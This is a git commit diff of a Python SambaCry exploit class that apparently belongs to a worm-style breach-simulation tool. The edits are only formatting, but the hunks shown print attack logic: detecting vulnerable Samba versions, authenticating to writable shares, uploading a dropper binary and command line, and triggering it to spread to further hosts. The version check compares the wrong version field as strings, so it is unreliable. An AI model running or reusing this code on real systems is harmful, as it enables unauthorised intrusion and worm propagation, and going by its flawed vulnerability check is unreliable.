This commit is contained in:
Daniel Goldberg 2017-09-28 14:22:35 +03:00
parent a27c802b11
commit 5586619f19
1 changed files with 20 additions and 15 deletions

View File

@ -1,11 +1,10 @@
import itertools
import logging import logging
import posixpath
import re import re
import sys
import time import time
from io import BytesIO from io import BytesIO
from os import path from os import path
import itertools
import posixpath
import impacket.smbconnection import impacket.smbconnection
from impacket.nt_errors import STATUS_SUCCESS from impacket.nt_errors import STATUS_SUCCESS
@ -37,7 +36,6 @@ class SambaCryExploiter(HostExploiter):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
def exploit_host(self, host, depth=-1, src_path=None): def exploit_host(self, host, depth=-1, src_path=None):
if not self.is_vulnerable(host): if not self.is_vulnerable(host):
return False return False
@ -66,7 +64,8 @@ class SambaCryExploiter(HostExploiter):
host.services[SMB_SERVICE]["shares"][share]["fullpath"] = fullpath host.services[SMB_SERVICE]["shares"][share]["fullpath"] = fullpath
if len(successfully_triggered_shares) > 0: if len(successfully_triggered_shares) > 0:
LOG.info("Shares triggered successfully on host %s: %s" % (host.ip_addr, str(successfully_triggered_shares))) LOG.info(
"Shares triggered successfully on host %s: %s" % (host.ip_addr, str(successfully_triggered_shares)))
return True return True
else: else:
LOG.info("No shares triggered successfully on host %s" % host.ip_addr) LOG.info("No shares triggered successfully on host %s" % host.ip_addr)
@ -86,7 +85,8 @@ class SambaCryExploiter(HostExploiter):
self.trigger_module(smb_client, share) self.trigger_module(smb_client, share)
smb_client.close() smb_client.close()
except (impacket.smbconnection.SessionError, SessionError): except (impacket.smbconnection.SessionError, SessionError):
LOG.debug("Exception trying to exploit host: %s, share: %s, with creds: %s." % (host.ip_addr, share, str(creds))) LOG.debug(
"Exception trying to exploit host: %s, share: %s, with creds: %s." % (host.ip_addr, share, str(creds)))
def clean_share(self, ip, share, creds): def clean_share(self, ip, share, creds):
""" """
@ -198,11 +198,14 @@ class SambaCryExploiter(HostExploiter):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] <= "3"):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (samba_version_parts[1] <= "13"): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "4") and (
samba_version_parts[1] <= "13"):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (samba_version_parts[1] <= "9"): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "5") and (
samba_version_parts[1] <= "9"):
is_vulnerable = True is_vulnerable = True
elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (samba_version_parts[1] <= "3"): elif (samba_version_parts[0] == "4") and (samba_version_parts[1] == "6") and (
samba_version_parts[1] <= "3"):
is_vulnerable = True is_vulnerable = True
LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" % LOG.info("Host: %s.samba server name: %s. samba version: %s. is vulnerable: %s" %
@ -244,7 +247,8 @@ class SambaCryExploiter(HostExploiter):
""" """
tree_id = smb_client.connectTree(share) tree_id = smb_client.connectTree(share)
with self.get_monkey_commandline_file(host, depth, self._config.dropper_target_path_linux) as monkey_commandline_file: with self.get_monkey_commandline_file(host, depth,
self._config.dropper_target_path_linux) as monkey_commandline_file:
smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read) smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file: with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
@ -326,7 +330,6 @@ class SambaCryExploiter(HostExploiter):
else: else:
return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb") return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
def get_monkey_commandline_file(self, host, depth, location): def get_monkey_commandline_file(self, host, depth, location):
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location)) return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
@ -407,5 +410,7 @@ class SambaCryExploiter(HostExploiter):
return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate) return smb_client.getSMBServer().nt_create_andx(treeId, pathName, cmd=ntCreate)
else: else:
return self.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA, shareMode=FILE_SHARE_READ, return self.create_smb(smb_client, treeId, pathName, desiredAccess=FILE_READ_DATA,
creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE, fileAttributes=0) shareMode=FILE_SHARE_READ,
creationOptions=FILE_OPEN, creationDisposition=FILE_NON_DIRECTORY_FILE,
fileAttributes=0)